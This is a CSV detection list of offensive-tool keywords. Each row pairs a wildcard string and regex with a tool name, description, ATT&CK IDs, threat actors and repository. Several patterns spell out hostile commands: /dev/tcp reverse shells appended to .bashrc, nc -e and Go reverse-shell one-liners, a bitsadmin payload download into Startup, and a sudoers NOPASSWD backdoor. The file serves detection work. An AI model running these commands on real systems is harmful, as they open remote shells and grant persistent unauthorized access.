"*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#linux","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","42689"
"*echo * > \\.\pipe\*",".{0,1000}echo\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","42693"
"*echo */24 | dnsx -silent -resp-only -ptr*",".{0,1000}echo\s.{0,1000}\/24\s\|\sdnsx\s\-silent\s\-resp\-only\s\-ptr.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42697"
"*echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet*",".{0,1000}echo\s1\s\>\/proc\/sys\/net\/ipv4\/conf\/all\/route_localnet.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","42710"
"*echo 123 > c:\windows\temp\test.txt*",".{0,1000}echo\s123\s\>\sc\:\\windows\\temp\\test\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","42711"
"*echo '8.8.8.8' | hakrevdns*",".{0,1000}echo\s\'8\.8\.8\.8\'\s\|\shakrevdns.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","42712"
"*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42714"
"*echo bitsadmin /transfer Packages /download /priority foreground %a% ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe*",".{0,1000}echo\sbitsadmin\s\/transfer\sPackages\s\/download\s\/priority\sforeground\s\%a\%\s\""\%USERPROFILE\%\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\Winupdate\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42716"
"*echo -e ""getClusterCapabilityData*",".{0,1000}echo\s\-e\s\""getClusterCapabilityData.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","42718"
"*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42719"
"*echo 'import os'*echo*os.system(""nc -e sh*'* > /tmp/*",".{0,1000}echo\s\'import\sos\'.{0,1000}echo.{0,1000}os\.system\(\""nc\s\-e\ssh.{0,1000}\'.{0,1000}\s\>\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42721"
"*echo msfvenom -p windows*",".{0,1000}echo\smsfvenom\s\-p\swindows.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","42723"
"*echo -n 'cmd /c start rundll32 *.dll* | base64*",".{0,1000}echo\s\-n\s\'cmd\s\/c\sstart\srundll32\s.{0,1000}\.dll.{0,1000}\s\|\sbase64.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","42724"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42726"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42727"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42728"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""cmd"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""cmd\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42729"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""powershell"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""powershell\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42730"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""pwsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""pwsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42731"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42732"
"*echo 'package main;*net.Dial(""tcp""*exec.Command(""zsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""zsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","42733"
"*echo 'PEzor!!*",".{0,1000}echo\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","42734"
"*echo powershell -command ""start Winupdate.exe"" >>*.bat*",".{0,1000}echo\spowershell\s\-command\s\""start\sWinupdate\.exe\""\s\>\>.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42735"
"*echo UAC.ShellExecute *cmd.exe*",".{0,1000}echo\sUAC\.ShellExecute\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","42738"
"*echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers*",".{0,1000}echo\s\'user\sALL\=\(ALL\)\sNOPASSWD\:ALL\'\s\>\>\s\/etc\/sudoers.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","42739"
"*echo 'WinPwnage' *",".{0,1000}echo\s\'WinPwnage\'\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42740"
"*echo:iex([System.Text.Encoding]::ASCII.GetString(*",".{0,1000}echo\:iex\(\[System\.Text\.Encoding\]\:\:ASCII\.GetString\(.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","42741"
"*echoac-poc-main*",".{0,1000}echoac\-poc\-main.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","42742"
"*echowrecker*",".{0,1000}echowrecker.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols)  for FreeBSD  OpenBSD 3.1  OpenBSD 3.2 (with a non-executable stack  zomg)  and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","42743"
"*ecryptfs2john.py*",".{0,1000}ecryptfs2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","42745"
"*ecs_task_def_data/all_task_def.txt*",".{0,1000}ecs_task_def_data\/all_task_def\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","42746"
"*ed026677076b2698d11c46ffe8389c79069301b985c0c7ed50bcb84c09d28861*",".{0,1000}ed026677076b2698d11c46ffe8389c79069301b985c0c7ed50bcb84c09d28861.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42747"
"*ed05f1f81000737f45d7e490a10f3b8c36b0cf898b51fe1966ce63f034e8ffcf*",".{0,1000}ed05f1f81000737f45d7e490a10f3b8c36b0cf898b51fe1966ce63f034e8ffcf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42749"
"*ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa*",".{0,1000}ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42751"
"*ed0a5937431223b74f639b0446fb35e05cd86cef2a752d5dd53d46555cee5e9b*",".{0,1000}ed0a5937431223b74f639b0446fb35e05cd86cef2a752d5dd53d46555cee5e9b.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","42752"
"*ed0baea4cf8c5e3a0dce2db731ab38e324ce9db4269952fd9b90dc007c5d4291*",".{0,1000}ed0baea4cf8c5e3a0dce2db731ab38e324ce9db4269952fd9b90dc007c5d4291.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","42753"
"*ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470*",".{0,1000}ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42754"
"*ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84*",".{0,1000}ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42755"
"*ed1041a720c35f70b8354bfda4e020525553da2ae1c83dd166388c9c66522a8d*",".{0,1000}ed1041a720c35f70b8354bfda4e020525553da2ae1c83dd166388c9c66522a8d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42756"
"*ed12460f0823550d20f0ecef4c0fd8007b0ac864aa005c996b62ead068c6952d*",".{0,1000}ed12460f0823550d20f0ecef4c0fd8007b0ac864aa005c996b62ead068c6952d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42757"
